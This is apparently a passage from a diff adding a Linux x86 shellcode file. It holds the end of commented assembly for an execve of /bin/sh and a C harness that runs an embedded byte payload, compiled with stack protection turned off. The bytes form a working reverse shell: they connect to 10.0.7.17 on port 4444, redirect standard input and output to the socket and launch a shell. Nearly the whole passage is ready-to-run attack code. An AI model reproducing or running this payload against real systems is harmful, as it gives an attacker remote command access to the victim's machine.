+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; + +; the second parameter is needs to be "//bin/sh,0x00000000" +; which we can accomplish by moving ebx onto the stack +; and then moving esp into ecx since it will be on the stack + +push ebx ; pushing "//bin/sh,0x00000000" back to the stack +mov ecx, esp ; moving the address of ebx (on the stack) to ecx + +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; +; now we look like: execve("//bin/sh,0x00000000", *"//bin/sh,0x00000000", 0x00000000); +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; + +; loading syscall execve +mov al, 0x0B ; syscall for execve is 11 dec / 0x0B hex +int 0x80 + +*/ + +#include +#include + +//compile with: gcc shellcode.c -o shellcode -fno-stack-protector -z execstack + +unsigned char code[] = \ +"\x31\xc0\x50\x6a\x01\x6a\x02\x89\xe1\x31\xc0\xb0\x66\x31\xdb\xb3\x01\xcd\x80\x96\x31\xd2\x52\xc6\x04\x24\x0a\xc6\x44\x24\x02\x07\xc6\x44\x24\x03\x11\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\x43\x43\x31\xc0\xb0\x66\xcd\x80\x89\xf3\x31\xc9\xb1\x03\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\x75\xf6\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"; + +main() +{ + printf("Shellcode Length: %d\n", strlen(code)); + int (*ret)() = (int(*)())code; + ret(); +} \ No newline at end of file